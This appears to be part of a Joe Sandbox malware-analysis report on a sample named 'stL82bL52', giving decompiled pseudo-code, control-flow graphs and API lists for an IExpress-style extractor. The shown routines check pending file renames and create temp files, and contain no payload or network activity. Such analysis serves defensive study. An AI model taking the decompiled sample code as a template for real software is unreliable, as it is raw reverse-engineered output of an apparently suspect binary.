                                                                                                                                                                                                        0x001f2573
                                                                                                                                                                                                        0x001f2575
                                                                                                                                                                                                        0x001f2578
                                                                                                                                                                                                        0x001f257d
                                                                                                                                                                                                        0x001f2627
                                                                                                                                                                                                        0x001f2583
                                                                                                                                                                                                        0x001f2586
                                                                                                                                                                                                        0x001f2589
                                                                                                                                                                                                        0x001f25eb
                                                                                                                                                                                                        0x001f2607
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2609
                                                                                                                                                                                                        0x001f261a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f261a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f258b
                                                                                                                                                                                                        0x001f258b
                                                                                                                                                                                                        0x001f259e
                                                                                                                                                                                                        0x001f25b2
                                                                                                                                                                                                        0x001f25ba
                                                                                                                                                                                                        0x001f25cb
                                                                                                                                                                                                        0x001f25d1
                                                                                                                                                                                                        0x001f25d6
                                                                                                                                                                                                        0x001f25da
                                                                                                                                                                                                        0x001f25dd
                                                                                                                                                                                                        0x001f25dd
                                                                                                                                                                                                        0x001f25e3
                                                                                                                                                                                                        0x001f25e3
                                                                                                                                                                                                        0x001f25e3
                                                                                                                                                                                                        0x001f258b
                                                                                                                                                                                                        0x001f2589
                                                                                                                                                                                                        0x001f262f
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,001F4096,001F4096,?,001F1ED3,00000001,00000000,?,?,001F4137,?), ref: 001F25B2
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,001F4096,?,001F1ED3,00000001,00000000,?,?,001F4137,?,001F4096), ref: 001F25CB
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,001F1ED3,00000001,00000000,?,?,001F4137,?,001F4096), ref: 001F25DD
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,001F4096,001F4096,?,001F1ED3,00000001,00000000,?,?,001F4137,?), ref: 001F25FF
                                                                                                                                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,001F4096,00000000,00000000,00000000,00000000,?,001F1ED3,00000001,00000000), ref: 001F261A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • PendingFileRenameOperations, xrefs: 001F25C3
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 001F25F5
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 001F25A8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                        • API String ID: 2209512893-559176071
                                                                                                                                                                                                        • Opcode ID: 07c46ac9aa7431f44048e88030656763f37bbdb74779f0c7367f3629ec4e83ad
                                                                                                                                                                                                        • Instruction ID: 9f8303ad7486294dc17f9867048f1e737b848d827c5a12444c03323725ade797
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07c46ac9aa7431f44048e88030656763f37bbdb74779f0c7367f3629ec4e83ad
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26118C7594222CBBDF209B929C09DFBBEBCEF027A1F508055FA0CE2050DB345E44E6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 577 1f6a60-1f6a91 call 1f7155 call 1f7208 GetStartupInfoW 583 1f6a93-1f6aa2 577->583 584 1f6abc-1f6abe 583->584 585 1f6aa4-1f6aa6 583->585 588 1f6abf-1f6ac5 584->588 586 1f6aaf-1f6aba Sleep 585->586 587 1f6aa8-1f6aad 585->587 586->583 587->588 589 1f6ac7-1f6acf _amsg_exit 588->589 590 1f6ad1-1f6ad7 588->590 591 1f6b0b-1f6b11 589->591 592 1f6ad9-1f6ae9 call 1f6c3f 590->592 593 1f6b05 590->593 595 1f6b2e-1f6b30 591->595 596 1f6b13-1f6b24 _initterm 591->596 597 1f6aee-1f6af2 592->597 593->591 598 1f6b3b-1f6b42 595->598 599 1f6b32-1f6b39 595->599 596->595 597->591 600 1f6af4-1f6b00 597->600 601 1f6b67-1f6b71 598->601 602 1f6b44-1f6b51 call 1f7060 598->602 599->598 604 1f6c39-1f6c3e call 1f724d 600->604 603 1f6b74-1f6b79 601->603 602->601 615 1f6b53-1f6b65 602->615 606 1f6b7b-1f6b7d 603->606 607 1f6bc5-1f6bc8 603->607 612 1f6b7f-1f6b81 606->612 613 1f6b94-1f6b98 606->613 610 1f6bca-1f6bd3 607->610 611 1f6bd6-1f6be3 _ismbblead 607->611 610->611 616 1f6be9-1f6bed 611->616 617 1f6be5-1f6be6 611->617 612->607 618 1f6b83-1f6b85 612->618 619 1f6b9a-1f6b9e 613->619 620 1f6ba0-1f6ba2 613->620 615->601 616->603 622 1f6c1e-1f6c25 616->622 617->616 618->613 623 1f6b87-1f6b8a 618->623 624 1f6ba3-1f6bbc call 1f2bfb 619->624 620->624 625 1f6c27-1f6c2d _cexit 622->625 626 1f6c32 622->626 623->613 627 1f6b8c-1f6b92 623->627 624->622 630 1f6bbe-1f6bbf exit 624->630 625->626 626->604 627->618 630->607
                                                                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int* _t25;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed char _t41;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                                                        				intOrPtr* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				E001F7155();
                                                                                                                                                                                                        				_push(0x58);
                                                                                                                                                                                                        				_push(0x1f72b8);
                                                                                                                                                                                                        				E001F7208(__ebx, __edi, __esi);
                                                                                                                                                                                                        				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                        				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                        				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                        				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                        				_t53 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                        					if(0 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(0 != _t56) {
                                                                                                                                                                                                        						Sleep(0x3e8);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t58 = 1;
                                                                                                                                                                                                        						_t53 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_t67 =  *0x1f88b0 - _t58; // 0x2
                                                                                                                                                                                                        					if(_t67 != 0) {
                                                                                                                                                                                                        						__eflags =  *0x1f88b0; // 0x2
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							 *0x1f81e4 = _t58;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0x1f88b0 = _t58;
                                                                                                                                                                                                        							_t37 = E001F6C3F(0x1f10b8, 0x1f10c4); // executed
                                                                                                                                                                                                        							__eflags = _t37;
                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                        								goto L13;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        								_t30 = 0xff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(0x1f);
                                                                                                                                                                                                        						L001F6FF4();
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						_t68 =  *0x1f88b0 - _t58; // 0x2
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_push(0x1f10b4);
                                                                                                                                                                                                        							_push(0x1f10ac);
                                                                                                                                                                                                        							L001F7202();
                                                                                                                                                                                                        							 *0x1f88b0 = 2;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(_t53 == 0) {
                                                                                                                                                                                                        							 *0x1f88ac = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t71 =  *0x1f88b4;
                                                                                                                                                                                                        						if( *0x1f88b4 != 0 && E001F7060(_t71, 0x1f88b4) != 0) {
                                                                                                                                                                                                        							_t60 =  *0x1f88b4; // 0x0
                                                                                                                                                                                                        							 *0x1fa288(0, 2, 0);
                                                                                                                                                                                                        							 *_t60();
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t25 = __imp___acmdln; // 0x76235b9c
                                                                                                                                                                                                        						_t59 =  *_t25;
                                                                                                                                                                                                        						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t41 =  *_t59;
                                                                                                                                                                                                        							if(_t41 > 0x20) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							if(_t41 != 0) {
                                                                                                                                                                                                        								if(_t54 != 0) {
                                                                                                                                                                                                        									goto L32;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                        										_t59 = _t59 + 1;
                                                                                                                                                                                                        										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        										_t41 =  *_t59;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                        							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                        								_t29 = 0xa;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(_t29);
                                                                                                                                                                                                        							_t30 = E001F2BFB(0x1f0000, 0, _t59); // executed
                                                                                                                                                                                                        							 *0x1f81e0 = _t30;
                                                                                                                                                                                                        							__eflags =  *0x1f81f8;
                                                                                                                                                                                                        							if( *0x1f81f8 == 0) {
                                                                                                                                                                                                        								exit(_t30); // executed
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *0x1f81e4;
                                                                                                                                                                                                        							if( *0x1f81e4 == 0) {
                                                                                                                                                                                                        								__imp___cexit();
                                                                                                                                                                                                        								_t30 =  *0x1f81e0; // 0x80070002
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        							goto L40;
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							__eflags = _t41 - 0x22;
                                                                                                                                                                                                        							if(_t41 == 0x22) {
                                                                                                                                                                                                        								__eflags = _t54;
                                                                                                                                                                                                        								_t15 = _t54 == 0;
                                                                                                                                                                                                        								__eflags = _t15;
                                                                                                                                                                                                        								_t54 = 0 | _t15;
                                                                                                                                                                                                        								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                        							__imp___ismbblead(_t26);
                                                                                                                                                                                                        							__eflags = _t26;
                                                                                                                                                                                                        							if(_t26 != 0) {
                                                                                                                                                                                                        								_t59 = _t59 + 1;
                                                                                                                                                                                                        								__eflags = _t59;
                                                                                                                                                                                                        								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t59 = _t59 + 1;
                                                                                                                                                                                                        							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L40:
                                                                                                                                                                                                        					return E001F724D(_t30);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t58 = 1;
                                                                                                                                                                                                        				__eflags = 1;
                                                                                                                                                                                                        				goto L7;
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x001f6a60
                                                                                                                                                                                                        0x001f6a6a
                                                                                                                                                                                                        0x001f6a6c
                                                                                                                                                                                                        0x001f6a71
                                                                                                                                                                                                        0x001f6a78
                                                                                                                                                                                                        0x001f6a7f
                                                                                                                                                                                                        0x001f6a85
                                                                                                                                                                                                        0x001f6a8e
                                                                                                                                                                                                        0x001f6a91
                                                                                                                                                                                                        0x001f6a93
                                                                                                                                                                                                        0x001f6a9c
                                                                                                                                                                                                        0x001f6aa2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f6aa6
                                                                                                                                                                                                        0x001f6ab4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f6aa8
                                                                                                                                                                                                        0x001f6aaa
                                                                                                                                                                                                        0x001f6aab
                                                                                                                                                                                                        0x001f6aab
                                                                                                                                                                                                        0x001f6abf
                                                                                                                                                                                                        0x001f6abf
                                                                                                                                                                                                        0x001f6ac5
                                                                                                                                                                                                        0x001f6ad1
                                                                                                                                                                                                        0x001f6ad7
                                                                                                                                                                                                        0x001f6b05
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f6ad9
                                                                                                                                                                                                        0x001f6ad9
                                                                                                                                                                                                        0x001f6ae9
                                                                                                                                                                                                        0x001f6af0
                                                                                                                                                                                                        0x001f6af2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f6af4
                                                                                                                                                                                                        0x001f6af4
                                                                                                                                                                                                        0x001f6afb
                                                                                                                                                                                                        0x001f6afb
                                                                                                                                                                                                        0x001f6af2
                                                                                                                                                                                                        0x001f6ac7
                                                                                                                                                                                                        0x001f6ac7
                                                                                                                                                                                                        0x001f6ac9
                                                                                                                                                                                                        0x001f6b0b
                                                                                                                                                                                                        0x001f6b0b
                                                                                                                                                                                                        0x001f6b11
                                                                                                                                                                                                        0x001f6b13
                                                                                                                                                                                                        0x001f6b18
                                                                                                                                                                                                        0x001f6b1d
                                                                                                                                                                                                        0x001f6b24
                                                                                                                                                                                                        0x001f6b24
                                                                                                                                                                                                        0x001f6b30
                                                                                                                                                                                                        0x001f6b39
                                                                                                                                                                                                        0x001f6b39
                                                                                                                                                                                                        0x001f6b3b
                                                                                                                                                                                                        0x001f6b42
                                                                                                                                                                                                        0x001f6b57
                                                                                                                                                                                                        0x001f6b5f
                                                                                                                                                                                                        0x001f6b65
                                                                                                                                                                                                        0x001f6b65
                                                                                                                                                                                                        0x001f6b67
                                                                                                                                                                                                        0x001f6b6c
                                                                                                                                                                                                        0x001f6b6e
                                                                                                                                                                                                        0x001f6b71
                                                                                                                                                                                                        0x001f6b74
                                                                                                                                                                                                        0x001f6b74
                                                                                                                                                                                                        0x001f6b79
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f6b7d
                                                                                                                                                                                                        0x001f6b81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f6b83
                                                                                                                                                                                                        0x001f6b8c
                                                                                                                                                                                                        0x001f6b8d
                                                                                                                                                                                                        0x001f6b90
                                                                                                                                                                                                        0x001f6b90
                                                                                                                                                                                                        0x001f6b83
                                                                                                                                                                                                        0x001f6b81
                                                                                                                                                                                                        0x001f6b94
                                                                                                                                                                                                        0x001f6b98
                                                                                                                                                                                                        0x001f6ba2
                                                                                                                                                                                                        0x001f6b9a
                                                                                                                                                                                                        0x001f6b9a
                                                                                                                                                                                                        0x001f6b9a
                                                                                                                                                                                                        0x001f6ba3
                                                                                                                                                                                                        0x001f6bab
                                                                                                                                                                                                        0x001f6bb0
                                                                                                                                                                                                        0x001f6bb5
                                                                                                                                                                                                        0x001f6bbc
                                                                                                                                                                                                        0x001f6bbf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f6bbf
                                                                                                                                                                                                        0x001f6c1e
                                                                                                                                                                                                        0x001f6c25
                                                                                                                                                                                                        0x001f6c27
                                                                                                                                                                                                        0x001f6c2d
                                                                                                                                                                                                        0x001f6c2d
                                                                                                                                                                                                        0x001f6c32
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f6bc5
                                                                                                                                                                                                        0x001f6bc5
                                                                                                                                                                                                        0x001f6bc8
                                                                                                                                                                                                        0x001f6bcc
                                                                                                                                                                                                        0x001f6bce
                                                                                                                                                                                                        0x001f6bce
                                                                                                                                                                                                        0x001f6bd1
                                                                                                                                                                                                        0x001f6bd3
                                                                                                                                                                                                        0x001f6bd3
                                                                                                                                                                                                        0x001f6bd6
                                                                                                                                                                                                        0x001f6bda
                                                                                                                                                                                                        0x001f6be1
                                                                                                                                                                                                        0x001f6be3
                                                                                                                                                                                                        0x001f6be5
                                                                                                                                                                                                        0x001f6be5
                                                                                                                                                                                                        0x001f6be6
                                                                                                                                                                                                        0x001f6be6
                                                                                                                                                                                                        0x001f6be9
                                                                                                                                                                                                        0x001f6bea
                                                                                                                                                                                                        0x001f6bea
                                                                                                                                                                                                        0x001f6b74
                                                                                                                                                                                                        0x001f6c39
                                                                                                                                                                                                        0x001f6c3e
                                                                                                                                                                                                        0x001f6c3e
                                                                                                                                                                                                        0x001f6abe
                                                                                                                                                                                                        0x001f6abe
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 001F7182
                                                                                                                                                                                                          • Part of subcall function 001F7155: GetCurrentProcessId.KERNEL32 ref: 001F7191
                                                                                                                                                                                                          • Part of subcall function 001F7155: GetCurrentThreadId.KERNEL32 ref: 001F719A
                                                                                                                                                                                                          • Part of subcall function 001F7155: GetTickCount.KERNEL32 ref: 001F71A3
                                                                                                                                                                                                          • Part of subcall function 001F7155: QueryPerformanceCounter.KERNEL32(?), ref: 001F71B8
                                                                                                                                                                                                        • GetStartupInfoW.KERNEL32(?,001F72B8,00000058), ref: 001F6A7F
                                                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 001F6AB4
                                                                                                                                                                                                        • _amsg_exit.MSVCRT ref: 001F6AC9
                                                                                                                                                                                                        • _initterm.MSVCRT ref: 001F6B1D
                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 001F6B49
                                                                                                                                                                                                        • exit.KERNELBASE ref: 001F6BBF
                                                                                                                                                                                                        • _ismbblead.MSVCRT ref: 001F6BDA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836923961-0
                                                                                                                                                                                                        • Opcode ID: 07a5144c6cf5692d6d62b6ef45de3278a00762c85b16c4f9d50d49799a1dfce5
                                                                                                                                                                                                        • Instruction ID: 400bb6ddfce609b3de1e74c3d9db1ea8a22a1785ddaa5b1c336713cd33ed4634
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07a5144c6cf5692d6d62b6ef45de3278a00762c85b16c4f9d50d49799a1dfce5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F41DE71A4832DDFDB259B68DC1577A77A0BB44760F68012AEB46E36D0CF744881CB81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 631 1f58c8-1f58d5 632 1f58d8-1f58dd 631->632 632->632 633 1f58df-1f58f1 LocalAlloc 632->633 634 1f5919-1f5959 call 1f1680 call 1f658a CreateFileA LocalFree 633->634 635 1f58f3-1f5901 call 1f44b9 633->635 638 1f5906-1f5910 call 1f6285 634->638 644 1f595b-1f596c CloseHandle GetFileAttributesA 634->644 635->638 645 1f5912-1f5918 638->645 644->638 646 1f596e-1f5970 644->646 646->638 647 1f5972-1f597b 646->647 647->645
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E001F58C8(intOrPtr* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				signed char _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				intOrPtr* _t27;
                                                                                                                                                                                                        				CHAR* _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t27 = __ecx;
                                                                                                                                                                                                        				_t23 = __ecx + 1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t6 =  *_t27;
                                                                                                                                                                                                        					_t27 = _t27 + 1;
                                                                                                                                                                                                        				} while (_t6 != 0);
                                                                                                                                                                                                        				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                        				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                                                        					E001F1680(_t20, _t36, _t33);
                                                                                                                                                                                                        					E001F658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                        					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                        					_v8 = _t10;
                                                                                                                                                                                                        					LocalFree(_t20);
                                                                                                                                                                                                        					_t12 = _v8;
                                                                                                                                                                                                        					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						CloseHandle(_t12);
                                                                                                                                                                                                        						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                        						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0x1f9124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E001F44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        					_t14 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t14;
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        0x001f58cd
                                                                                                                                                                                                        0x001f58d1
                                                                                                                                                                                                        0x001f58d3
                                                                                                                                                                                                        0x001f58d5
                                                                                                                                                                                                        0x001f58d8
                                                                                                                                                                                                        0x001f58d8
                                                                                                                                                                                                        0x001f58da
                                                                                                                                                                                                        0x001f58db
                                                                                                                                                                                                        0x001f58e1
                                                                                                                                                                                                        0x001f58ed
                                                                                                                                                                                                        0x001f58f1
                                                                                                                                                                                                        0x001f591e
                                                                                                                                                                                                        0x001f592c
                                                                                                                                                                                                        0x001f5943
                                                                                                                                                                                                        0x001f594a
                                                                                                                                                                                                        0x001f594d
                                                                                                                                                                                                        0x001f5953
                                                                                                                                                                                                        0x001f5959
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f595b
                                                                                                                                                                                                        0x001f595c
                                                                                                                                                                                                        0x001f5963
                                                                                                                                                                                                        0x001f596c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5972
                                                                                                                                                                                                        0x001f5974
                                                                                                                                                                                                        0x001f597a
                                                                                                                                                                                                        0x001f597a
                                                                                                                                                                                                        0x001f596c
                                                                                                                                                                                                        0x001f58f3
                                                                                                                                                                                                        0x001f5901
                                                                                                                                                                                                        0x001f5906
                                                                                                                                                                                                        0x001f590b
                                                                                                                                                                                                        0x001f5910
                                                                                                                                                                                                        0x001f5910
                                                                                                                                                                                                        0x001f5918

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,001F5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F58E7
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,001F5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F5943
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,001F5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F594D
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,001F5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F595C
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,001F5534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001F5963
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
                                                                                                                                                                                                        • API String ID: 747627703-394614654
